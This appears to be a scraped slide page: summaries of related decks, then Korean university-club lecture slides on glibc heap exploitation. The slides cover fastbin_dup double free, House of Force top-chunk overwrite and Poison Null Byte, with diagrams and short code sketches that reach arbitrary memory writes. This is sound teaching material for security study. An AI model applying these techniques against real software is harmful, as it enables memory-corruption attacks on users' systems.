The document discusses the internals of the Windows heap and how it can be exploited for arbitrary memory overwrites. It covers the key data structures used in heap management like segments, free lists, lookaside tables, and virtually allocated chunks. The algorithms for allocation and freeing memory from the heap are explained in detail. Special techniques for reliable heap exploitation are presented for overcoming issues with service pack dependencies and unknown addresses.
This document discusses database backup and recovery. It defines backup as additional copies of data for restoration if the primary copy is lost or corrupted. There are several types of backups including full, incremental, differential, and mirror backups. Recovery brings the database back to a prior consistent state, using techniques like log files, check pointing, and immediate or deferred transaction updates. Factors like backup location, test restores, automation, and database design can influence recovery duration. Alternatives to traditional backup and recovery include standby databases, replication, and disk mirroring.
The document provides details about the Pentium II processor, including its 64-bit data bus, 32-bit address size supporting 4GB of addressable memory, and dual integer pipelines. It describes changes in Pentium II such as moving the level 2 cache closer to the microprocessor to reduce costs and improve efficiency. Finally, it outlines new instructions for fast system calls and restoring MMX state that improved performance.
MacOS memory allocator (libmalloc) ExploitationAngel Boy
ย
The document discusses the memory allocator libmalloc used in MacOS. It details the data structures used to manage tiny chunks of memory less than 1008 bytes, including blocks, chunks, magazines, free lists, bitmaps and regions. The mechanism of allocating, freeing and caching tiny chunks is also described.
Windows 10 Nt Heap Exploitation (English version)Angel Boy
ย
The document discusses the Windows memory allocator and heap exploitation. It describes the core components and data structures of the NT heap, including the _HEAP structure, _HEAP_ENTRY chunks, BlocksIndex structure, and FreeLists. It also explains the differences between the backend and frontend allocators as well as how chunks of different sizes are managed.
The document discusses Linux file systems. It describes that Linux uses a hierarchical tree structure with everything treated as a file. It explains the basic components of a file system including the boot block, super block, inode list, and block list. It then covers different types of file systems for Linux like ext2, ext3, ext4, FAT32, NTFS, and network file systems like NFS and SMB. It also discusses absolute vs relative paths and mounting and unmounting filesystems using the mount and umount commands.
The document discusses the process from compiling source code to executing a program. It covers preprocessing, compilation, assembly, linking, and the ELF file format. Preprocessing handles macros and conditionals. Compilation translates to assembly code. Assembly generates machine code. Linking combines object files and resolves symbols statically or dynamically using libraries. The ELF file format organizes machine code and data into sections in the executable.
The document discusses the internals of the Windows heap and how it can be exploited for arbitrary memory overwrites. It covers the key data structures used in heap management like segments, free lists, lookaside tables, and virtually allocated chunks. The algorithms for allocation and freeing memory from the heap are explained in detail. Special techniques for reliable heap exploitation are presented for overcoming issues with service pack dependencies and unknown addresses.
This document discusses database backup and recovery. It defines backup as additional copies of data for restoration if the primary copy is lost or corrupted. There are several types of backups including full, incremental, differential, and mirror backups. Recovery brings the database back to a prior consistent state, using techniques like log files, check pointing, and immediate or deferred transaction updates. Factors like backup location, test restores, automation, and database design can influence recovery duration. Alternatives to traditional backup and recovery include standby databases, replication, and disk mirroring.
The document provides details about the Pentium II processor, including its 64-bit data bus, 32-bit address size supporting 4GB of addressable memory, and dual integer pipelines. It describes changes in Pentium II such as moving the level 2 cache closer to the microprocessor to reduce costs and improve efficiency. Finally, it outlines new instructions for fast system calls and restoring MMX state that improved performance.
MacOS memory allocator (libmalloc) ExploitationAngel Boy
ย
The document discusses the memory allocator libmalloc used in MacOS. It details the data structures used to manage tiny chunks of memory less than 1008 bytes, including blocks, chunks, magazines, free lists, bitmaps and regions. The mechanism of allocating, freeing and caching tiny chunks is also described.
Windows 10 Nt Heap Exploitation (English version)Angel Boy
ย
The document discusses the Windows memory allocator and heap exploitation. It describes the core components and data structures of the NT heap, including the _HEAP structure, _HEAP_ENTRY chunks, BlocksIndex structure, and FreeLists. It also explains the differences between the backend and frontend allocators as well as how chunks of different sizes are managed.
The document discusses Linux file systems. It describes that Linux uses a hierarchical tree structure with everything treated as a file. It explains the basic components of a file system including the boot block, super block, inode list, and block list. It then covers different types of file systems for Linux like ext2, ext3, ext4, FAT32, NTFS, and network file systems like NFS and SMB. It also discusses absolute vs relative paths and mounting and unmounting filesystems using the mount and umount commands.
The document discusses the process from compiling source code to executing a program. It covers preprocessing, compilation, assembly, linking, and the ELF file format. Preprocessing handles macros and conditionals. Compilation translates to assembly code. Assembly generates machine code. Linking combines object files and resolves symbols statically or dynamically using libraries. The ELF file format organizes machine code and data into sections in the executable.
The Linux directory structure is organized with / as the root directory. Key directories include /bin and /sbin for essential system binaries, /boot for boot files, /dev for device files, /etc for configuration files, /home for user home directories, /lib for shared libraries, /media and /mnt for mounting removable media, /opt for optional application software, /proc for process information, /root for the root user's home, /tmp for temporary files, /usr for secondary hierarchy data and binaries, and /var for variable data.
This document discusses Intel's multi-core processor organization. It describes how a multi-core processor combines two or more processor cores onto a single silicon chip. It identifies key variables in multi-core organization as the number of cores, levels of cache memory, and amount of shared cache. It provides examples of Intel's Core i7, Core Duo, AMD Opteron, and ARM11 MP Core multi-core processors and highlights their core configurations and cache architectures.
Process' Virtual Address Space in GNU/LinuxVarun Mahajan
ย
The document discusses the virtual address space of a process in GNU/Linux. It explains that a process has both a user space and kernel space in virtual memory. The process' virtual address space contains text, data, and shared library segments. Functions like brk, sbrk, mmap, malloc, and free are used to allocate and free memory in the data segment to grow the process heap.
1) The document discusses different levels of programming languages including machine language, assembly language, and high-level languages. Assembly language uses symbolic instructions that directly correspond to machine language instructions.
2) It describes the components of the Intel 8086 processor including its 16-bit registers like the accumulator, base, count, and data registers as well as its segment, pointer, index, and status flag registers.
3) Binary numbers can be represented in signed magnitude, one's complement, or two's complement form. Two's complement is commonly used in modern computers as it allows for efficient addition and subtraction of binary numbers.
Linux Memory Management
1.Memory Structure of Linux OS.
2.How Program is loaded into the memory.
3.Address Translation.
4.Feature for Multithreading and Multiprocessing.
You didnt see itโs coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
ย
Past few years our team was focusing on different operating systems including Microsoft windows kernel. Honestly our first pwn at Windows kernel was not that challenging. Number of available targets with friendly environment for straightforward pwn, from user up to reliable kernel code execution.
However, step by step, security policies continue to evolve, and it becomes more troublesome to choose ideal attack surface from various sandboxes. In addition, what steps to follow for digging security holes is highly dependent upon the chosen target. In general, a few common strategies are available for researchers to choose: e.g choose โunknownโ one which hasnโt been researched before; Select well fuzzed or well audited one, or research on kernel module internals to find โhiddenโ attack surfaces which are not explicitly interconnected. In the first part of the talk we introduce our methodology of selecting, alongside with cost of tricks around to choose seemingly banned targets, illustrated by notable examples.
After getting hands on potential bug available from targeted sandbox, it is time for Microsoft windows taking hardening efforts to put attacker into corner. Strong mitigations are being introduced more frequently than ever, with promising direction which cuts lots of attack surface off, and a several exploitation techniques being killed. We will show difficulties of developing universal exploitation techniques, and demonstrate needed technical level depending on code quality of target. We will examine how different it becomes with era of Redstone and following versions even with those techniques and good vulnerability in hand. How it changed attacker landscape and how it will (and will not) kill those techniques and applications. However will it really change the game or not?
The document discusses the thread model of Java. It states that all Java class libraries are designed with multithreading in mind. Java uses threads to enable asynchronous behavior across the entire system. Once started, a thread can be suspended, resumed, or stopped. Threads are created by extending the Thread class or implementing the Runnable interface. Context switching allows switching between threads by yielding control voluntarily or through prioritization and preemption. Synchronization is needed when threads access shared resources using monitors implicit to each object. Threads communicate using notify() and wait() methods.
The document discusses C++ exploitation techniques including name mangling, virtual function tables, vtable hijacking, vectors, strings, and memory allocation/deallocation functions like new and delete. It provides details on how virtual function tables are used to implement polymorphism in C++ and how vtable hijacking can be used to exploit vulnerabilities by forcing a vtable and hijacking the virtual function pointer to call shellcode. It also explains how vectors and strings are implemented dynamically in memory and their memory layout.
This document discusses multiprogramming and time sharing in operating systems. It defines multiprogramming as allowing multiple programs to execute concurrently by assigning pending work to idle processors and I/O devices. Time sharing extends multiprogramming by rapidly switching between programs so that each program executes for a fixed time quantum, giving users the impression that the entire system is dedicated to their use. The key aspects covered are the concepts of processes, CPU scheduling, and how multiprogramming and time sharing improve resource utilization.
The Linux kernel tracks each process's memory usage through data structures stored in the process's task_struct. The mm_struct stored there contains pointers to vm_area_struct objects representing each memory mapping. When a process calls malloc(), the kernel allocates physical pages and updates the process's mm_struct and vm_area_structs to map the new memory region into its virtual address space. Similarly when a process forks, the child process inherits copies of the parent's mm_struct and vm_area_structs, giving it the same memory mappings while keeping the two processes' memory private.
Memory organization
Memory Organization in Computer Architecture. A memory unit is the collection of storage units or devices together. The memory unit stores the binary information in the form of bits. ... Volatile Memory: This loses its data, when power is switched off.
Windows 10 Nt Heap Exploitation (Chinese version)Angel Boy
ย
The document discusses Windows memory allocation and the NT heap. It describes the core data structures used, including the _HEAP, _HEAP_ENTRY chunks, and _HEAP_LIST_LOOKUP BlocksIndex. It explains how allocated, freed, and VirtualAlloc chunks are structured and managed in the Back-End, including using freelist chains and BlocksIndex to efficiently service allocation requests.
The document provides an overview of the Linux kernel architecture and processes. It discusses key kernel concepts like the monolithic kernel design, system calls, loadable modules, virtual memory, and preemptive multitasking. It also covers kernel functions, layers, and context switching between processes. The CPU scheduler, multi-threading, inter-process communication techniques, and tunable kernel parameters are summarized as well.
Globalwebtutors.com is an online tutoring platform that provides homework help, dissertation editing, assignment help, and question help. Users can send requirements to Support@globalwebtutors.com or connect via live chat. The document then discusses various aspects of memory management techniques used in operating systems like paging, segmentation, and virtual memory management. It describes processes like swapping, different address types, internal and external fragmentation, and more. More information is available at the provided link.
Linux uses memory management to partition memory between kernel and application spaces, organize memory using virtual addresses, and swap memory between primary and secondary storage. It divides memory using paging into equal-sized pages, creates virtual address spaces, and uses an MMU to translate between virtual and physical addresses. This allows processes to run independently with their own logical view of memory while the physical memory is shared.
COSCUP 2020 RISC-V 32 bit linux highmem portingEric Lin
ย
- The document discusses porting HIGHMEM support to 32-bit RISC-V Linux to allow the kernel to access physical memory above 896MB. It involves deciding the memory layout, creating a PKMAP region for temporary mappings, allocating FIXMAP slots for kmap_atomic(), and setting up a page table for the PKMAP region. However, maintaining HIGHMEM comes with performance costs and some upstream developers prefer to avoid it on new architectures if possible.
1. The document discusses various concepts of control flow in programming languages including sequencing, selection, iteration, recursion, and exceptions.
2. It covers different types of loops like for loops, while loops, and do-while loops. Various evaluation strategies are discussed including applicative order evaluation and normal order evaluation.
3. The key differences between iteration and recursion are explained. Recursion is more common in functional languages while iteration is used more often in imperative languages.
Linux Memory Management with CMA (Contiguous Memory Allocator)Pankaj Suryawanshi
ย
Fundamentals of Linux Memory Management and CMA (Contiguous Memory Allocator) In Linux.
Virtual Memory, Physical Memory, Swap Space, DMA, IOMMU, Paging, Segmentation, TLB, Hugepages, Ion google memory manager
This presentation is about timers in Linux based operating systems. It gives a brief idea about jiffies,system timer,real time clock,interrupts and how they are handled etc.
The Linux directory structure is organized with / as the root directory. Key directories include /bin and /sbin for essential system binaries, /boot for boot files, /dev for device files, /etc for configuration files, /home for user home directories, /lib for shared libraries, /media and /mnt for mounting removable media, /opt for optional application software, /proc for process information, /root for the root user's home, /tmp for temporary files, /usr for secondary hierarchy data and binaries, and /var for variable data.
This document discusses Intel's multi-core processor organization. It describes how a multi-core processor combines two or more processor cores onto a single silicon chip. It identifies key variables in multi-core organization as the number of cores, levels of cache memory, and amount of shared cache. It provides examples of Intel's Core i7, Core Duo, AMD Opteron, and ARM11 MP Core multi-core processors and highlights their core configurations and cache architectures.
Process' Virtual Address Space in GNU/LinuxVarun Mahajan
ย
The document discusses the virtual address space of a process in GNU/Linux. It explains that a process has both a user space and kernel space in virtual memory. The process' virtual address space contains text, data, and shared library segments. Functions like brk, sbrk, mmap, malloc, and free are used to allocate and free memory in the data segment to grow the process heap.
1) The document discusses different levels of programming languages including machine language, assembly language, and high-level languages. Assembly language uses symbolic instructions that directly correspond to machine language instructions.
2) It describes the components of the Intel 8086 processor including its 16-bit registers like the accumulator, base, count, and data registers as well as its segment, pointer, index, and status flag registers.
3) Binary numbers can be represented in signed magnitude, one's complement, or two's complement form. Two's complement is commonly used in modern computers as it allows for efficient addition and subtraction of binary numbers.
Linux Memory Management
1.Memory Structure of Linux OS.
2.How Program is loaded into the memory.
3.Address Translation.
4.Feature for Multithreading and Multiprocessing.
You didnt see itโs coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
ย
Past few years our team was focusing on different operating systems including Microsoft windows kernel. Honestly our first pwn at Windows kernel was not that challenging. Number of available targets with friendly environment for straightforward pwn, from user up to reliable kernel code execution.
However, step by step, security policies continue to evolve, and it becomes more troublesome to choose ideal attack surface from various sandboxes. In addition, what steps to follow for digging security holes is highly dependent upon the chosen target. In general, a few common strategies are available for researchers to choose: e.g choose โunknownโ one which hasnโt been researched before; Select well fuzzed or well audited one, or research on kernel module internals to find โhiddenโ attack surfaces which are not explicitly interconnected. In the first part of the talk we introduce our methodology of selecting, alongside with cost of tricks around to choose seemingly banned targets, illustrated by notable examples.
After getting hands on potential bug available from targeted sandbox, it is time for Microsoft windows taking hardening efforts to put attacker into corner. Strong mitigations are being introduced more frequently than ever, with promising direction which cuts lots of attack surface off, and a several exploitation techniques being killed. We will show difficulties of developing universal exploitation techniques, and demonstrate needed technical level depending on code quality of target. We will examine how different it becomes with era of Redstone and following versions even with those techniques and good vulnerability in hand. How it changed attacker landscape and how it will (and will not) kill those techniques and applications. However will it really change the game or not?
The document discusses the thread model of Java. It states that all Java class libraries are designed with multithreading in mind. Java uses threads to enable asynchronous behavior across the entire system. Once started, a thread can be suspended, resumed, or stopped. Threads are created by extending the Thread class or implementing the Runnable interface. Context switching allows switching between threads by yielding control voluntarily or through prioritization and preemption. Synchronization is needed when threads access shared resources using monitors implicit to each object. Threads communicate using notify() and wait() methods.
The document discusses C++ exploitation techniques including name mangling, virtual function tables, vtable hijacking, vectors, strings, and memory allocation/deallocation functions like new and delete. It provides details on how virtual function tables are used to implement polymorphism in C++ and how vtable hijacking can be used to exploit vulnerabilities by forcing a vtable and hijacking the virtual function pointer to call shellcode. It also explains how vectors and strings are implemented dynamically in memory and their memory layout.
This document discusses multiprogramming and time sharing in operating systems. It defines multiprogramming as allowing multiple programs to execute concurrently by assigning pending work to idle processors and I/O devices. Time sharing extends multiprogramming by rapidly switching between programs so that each program executes for a fixed time quantum, giving users the impression that the entire system is dedicated to their use. The key aspects covered are the concepts of processes, CPU scheduling, and how multiprogramming and time sharing improve resource utilization.
The Linux kernel tracks each process's memory usage through data structures stored in the process's task_struct. The mm_struct stored there contains pointers to vm_area_struct objects representing each memory mapping. When a process calls malloc(), the kernel allocates physical pages and updates the process's mm_struct and vm_area_structs to map the new memory region into its virtual address space. Similarly when a process forks, the child process inherits copies of the parent's mm_struct and vm_area_structs, giving it the same memory mappings while keeping the two processes' memory private.
Memory organization
Memory Organization in Computer Architecture. A memory unit is the collection of storage units or devices together. The memory unit stores the binary information in the form of bits. ... Volatile Memory: This loses its data, when power is switched off.
Windows 10 Nt Heap Exploitation (Chinese version)Angel Boy
ย
The document discusses Windows memory allocation and the NT heap. It describes the core data structures used, including the _HEAP, _HEAP_ENTRY chunks, and _HEAP_LIST_LOOKUP BlocksIndex. It explains how allocated, freed, and VirtualAlloc chunks are structured and managed in the Back-End, including using freelist chains and BlocksIndex to efficiently service allocation requests.
The document provides an overview of the Linux kernel architecture and processes. It discusses key kernel concepts like the monolithic kernel design, system calls, loadable modules, virtual memory, and preemptive multitasking. It also covers kernel functions, layers, and context switching between processes. The CPU scheduler, multi-threading, inter-process communication techniques, and tunable kernel parameters are summarized as well.
Globalwebtutors.com is an online tutoring platform that provides homework help, dissertation editing, assignment help, and question help. Users can send requirements to Support@globalwebtutors.com or connect via live chat. The document then discusses various aspects of memory management techniques used in operating systems like paging, segmentation, and virtual memory management. It describes processes like swapping, different address types, internal and external fragmentation, and more. More information is available at the provided link.
Linux uses memory management to partition memory between kernel and application spaces, organize memory using virtual addresses, and swap memory between primary and secondary storage. It divides memory using paging into equal-sized pages, creates virtual address spaces, and uses an MMU to translate between virtual and physical addresses. This allows processes to run independently with their own logical view of memory while the physical memory is shared.
COSCUP 2020 RISC-V 32 bit linux highmem portingEric Lin
ย
- The document discusses porting HIGHMEM support to 32-bit RISC-V Linux to allow the kernel to access physical memory above 896MB. It involves deciding the memory layout, creating a PKMAP region for temporary mappings, allocating FIXMAP slots for kmap_atomic(), and setting up a page table for the PKMAP region. However, maintaining HIGHMEM comes with performance costs and some upstream developers prefer to avoid it on new architectures if possible.
1. The document discusses various concepts of control flow in programming languages including sequencing, selection, iteration, recursion, and exceptions.
2. It covers different types of loops like for loops, while loops, and do-while loops. Various evaluation strategies are discussed including applicative order evaluation and normal order evaluation.
3. The key differences between iteration and recursion are explained. Recursion is more common in functional languages while iteration is used more often in imperative languages.
Linux Memory Management with CMA (Contiguous Memory Allocator)Pankaj Suryawanshi
ย
Fundamentals of Linux Memory Management and CMA (Contiguous Memory Allocator) In Linux.
Virtual Memory, Physical Memory, Swap Space, DMA, IOMMU, Paging, Segmentation, TLB, Hugepages, Ion google memory manager
This presentation is about timers in Linux based operating systems. It gives a brief idea about jiffies,system timer,real time clock,interrupts and how they are handled etc.
20. 20
Top Chunk?
Chunk Size
( 1000 )
User Data
(Top Chunk)
Chunk Size
( 30 )
User Data
Chunk Size
( 970 )
User Data
(Top Chunk)
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
23. 23
How2Heap Contents
Git clone https://github.com/shellphish/how2heap
Cd how2heap && make
./house_of_force
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
24. 24
Heap Exploit Techniques.
๏ง Use After Free
๏ง Double free bug ( ๋งํ )
๏ง Fastbin_dup
๏ง House of force
๏ง House of spirit
๏ง House of lore
๏ง Poison Null Byte
๏ง ๋ฑ๋ฑโฆ
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
32. 32
Fastbin_dup
๏ง Fastbin_dup
๏ง free(a); free(b); free(a);
๏ง int *c = malloc(8);
A
Fd = 2000
1000
Size
Fd
Bk
Unused
Size
User
Data
B
Fd = 1000
A
Fd = 2000
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
33. 33
Fastbin_dup
๏ง Fastbin_dup
๏ง free(a); free(b); free(a);
๏ง int *c = malloc(8); // ๊ฒฐ๊ณผ๊ฐ 1000
2000
Size
Fd
Bk
Unused
Size
User
Data
B
Fd = 1000
A
Fd = 2000
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
34. 34
Fastbin_dup
๏ง Fastbin_dup
๏ง free(a); free(b); free(a);
๏ง int *c = malloc(8); // ๊ฒฐ๊ณผ๊ฐ 1000
๏ง *c = 0x12345678
2000
Size
Fd
Bk
Unused
Size
User
Data
B
Fd = 1000
A , C
Fd = 2000
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
35. 35
Fastbin_dup
๏ง Fastbin_dup
๏ง free(a); free(b); free(a);
๏ง int *c = malloc(8); // ๊ฒฐ๊ณผ๊ฐ 1000
๏ง *c = 0x12345678;
2000
Size
Fd
Bk
Unused
Size
User
Data
B
Fd = 1000
A , C
Fd = 12345678
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
36. 36
Fastbin_dup
๏ง Fastbin_dup
๏ง free(a); free(b); free(a);
๏ง int *c = malloc(8); // ๊ฒฐ๊ณผ๊ฐ 1000
๏ง *c = 0x12345678;
๏ง Malloc(8); // 2000
๏ง Malloc(8); // 1000
๏ง Malloc(8); // 12345678
2000
Size
Fd
Bk
Unused
Size
User
Data
B
Fd = 1000
A , C
Fd = 12345678
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
37. 37
Fastbin_dup
๏ง Fastbin_dup ์ ๋ฆฌ
๏ง A ๋ 1000๋ฒ์ง, C ๋ 1000๋ฒ์ง
๏ง ๋๊ฐ์ ์์น๋ฅผ A, C ๋ ๊ฐ๊ฐ ๊ฐ๋ฆฌ์ผ์ ์๊น
๏ง C์๋ ์ฌ์ฉ์์ ๋ฐ์ดํฐ๊ฐ, A์๋ free list ๊ด๋ จ ๋ฐ์ดํฐ๊ฐ ์กด์ฌ.
๏ง ์๊ตฌ ์กฐ๊ฑด :
๋๋ธ ํ๋ฆฌ๊ฐ ์ผ์ด ๋์ผ ํจ ( a, b, a ์ฒ๋ผ ํ๋ ๊ฑด๋์ )
( 12345678 ๋ฒ์ง์ ์๋ Size ์์ญ์ ๋ง์ถฐ์ค์ผ ํจ )
( ํฌ๊ธฐ๊ฐ ์์ ์ฒญํฌ๋ค ์๋ง ์ ์ฉ์ด ๊ฐ๋ฅ ํจ )
Size
Fd
Bk
Unused
Size
User
Data
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
38. 38
House of force
๏ง top chunk size ์กฐ์์ ํตํด์ ์ํ๋ ์์น์ malloc์ ํ ์ ์์
๏ง ํ์์์ Buffer Overflow ์ทจ์ฝ์ ์ด ์ ํ ๋์ด์ผ ํจ.
char * string = ( char *) malloc( 10 );
strcpy( a, argv[1] );
๏ง Write โ What โ Where ๊ฐ๋ฅ
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
39. 39
House of force
Chunk Size
( 1000 )
User Data
(Top Chunk)
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
Malloc Size
1000 ์ดํ :
Top ์ฒญํฌ๊ฐ ๋๋ก ๋๋จ
1000 ์ด์ :
์๋ก์ด ๋ฉ๋ชจ๋ฆฌ ๋ฉ์ด๋ฆฌ๋ฅผ OS์ ์
์ฒญ
40. 40
House of force
Chunk Size
( 1000 )
User Data
(Top Chunk)
Chunk Size
( 30 )
User Data
Chunk Size
( 970 )
User Data
(Top Chunk)
Malloc(22);
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
41. 41
House of force
Chunk Size
( 970 )
User Data
(Top Chunk)
Chunk Size
( 30 )
AAAAAAAAA
AAAAAAAAA
AAAAAAAAA
AAAAAAAAA
AAAAAAAAA
Buffer Overflow
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
42. 42
House of force
Chunk Size
( 970 )
User Data
(Top Chunk)
Chunk Size
( 30 )
AAAAAAAAA
AAAAAAAAA
Chunk Size
( 41414141 )
User Data
(Top Chunk)
Buffer Overflow
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
Chunk Size
( 30 )
AAAAAAAAA
AAAAAAAAA
AAAAAAAAA
AAAAAAAAA
AAAAAAAAA
43. 43
House of force
Chunk Size
( 40000000 )
User Data
Chunk Size
( 1414141 )
User Data
(Top Chunk)
Malloc(40000000);
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
Chunk Size
( 41414141 )
User Data
(Top Chunk)
Chunk Size
( 30 )
User Data
44. 44
House of force
Malloc(100);
Chunk Size
( 100 )
User Data
Chunk Size
( 1414041 )
User Data
(Top Chunk)
Chunk Size
( 40000000 )
User Data
Chunk Size
( 1414141 )
User Data
(Top Chunk)
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
45. 45
House of force
Chunk Size
( 100 )
User Data
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
๏ง ์ด๋ ๊ฒ ๋ง๋ค์ด์ง ์ฒญํฌ๋ ๊ธฐ์กด์ ํ ๋ณด๋ค 40000000๋งํผ ๋จ์ด์ง ๊ณณ์ ์์น
๏ง 40000000์ ์กฐ์ํ๋ ๊ฒ์ผ๋ก ์ํ๋ ์์น์ malloc์ด ๊ฐ๋ฅํจ
โป realloc ๋ฑ์ ํจ์๋ size_t ํํ๋ผ์ ์์๋ฅผ ๋ฃ์ ๊ฒฝ์ฐ ์์ ์กฐ์์ด ๊ฐ๋ฅํจ
49. 49
Poison Null Byte
Prev | 101
User
Data
Line 2:
P = 0
Prev | 101
User
Data
Prev | 101
Fd
Bk
100 | 100
User
Data
Prev | 201
Fd
Bk
์ฑ๊ท ๊ด๋ํ๊ต H.I.T
Line 3: Line 4:
(Merged)